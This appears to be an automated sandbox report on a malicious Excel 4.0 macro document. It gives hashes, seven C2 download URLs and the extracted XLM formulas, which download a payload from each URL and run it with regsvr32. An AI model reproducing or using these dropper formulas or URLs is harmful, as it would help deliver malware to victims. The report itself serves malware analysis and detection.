General

  • Target: f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25
  • Size: 38KB
  • Sample: 241120-3dlfyawjat
  • MD5: 68bb87d405663f89976f2646ce87a7d5
  • SHA1: 01b51b47b141f27baa890dd6781d86cb4ddb19c7
  • SHA256: f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25
  • SHA512: 91411e57372cbdf67fc175da34a4202a44788c43c2f2ef6278a854eff4a4b63badf3dfa20b7e1edd848295d8228152bf6410b95c0d4fecfe695351592f64bb8d
  • SSDEEP: 768:3+d/GCR8UjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyu:3WT9OZZ1ZYpoQ/pMAeVIy08a

Score: 10/10

Malware Config

Extracted

Rule: Excel 4.0 XLM Macro

C2:
  • https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
  • https://alicehui.com/pics/yjGo0PrY/
  • https://albassiria.ma/EhT0YlEAF7/XsmBCt/
  • https://vika.pl/backup/Q4bAjod4QKE6epp/
  • https://andiso.dk/limny/2ZTmq/
  • https://www.impactad.co.kr/images/EDltKgE5p/
  • https://babylee.cl/site/sTBIv21f/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/","..\wnru.ocx",0,0)
    =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alicehui.com/pics/yjGo0PrY/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://albassiria.ma/EhT0YlEAF7/XsmBCt/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vika.pl/backup/Q4bAjod4QKE6epp/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andiso.dk/limny/2ZTmq/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.impactad.co.kr/images/EDltKgE5p/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://babylee.cl/site/sTBIv21f/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E27<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx")
    =RETURN()

Extracted

Language: xlm4.0

  Source          URLs
  xlm40.dropper   https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
  xlm40.dropper   https://alicehui.com/pics/yjGo0PrY/
  xlm40.dropper   https://albassiria.ma/EhT0YlEAF7/XsmBCt/
  xlm40.dropper   https://vika.pl/backup/Q4bAjod4QKE6epp/
  xlm40.dropper   https://andiso.dk/limny/2ZTmq/
  xlm40.dropper   https://www.impactad.co.kr/images/EDltKgE5p/
  xlm40.dropper   https://babylee.cl/site/sTBIv21f/

Extracted

Language: xlm4.0

  Source          URLs
  xlm40.dropper   https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
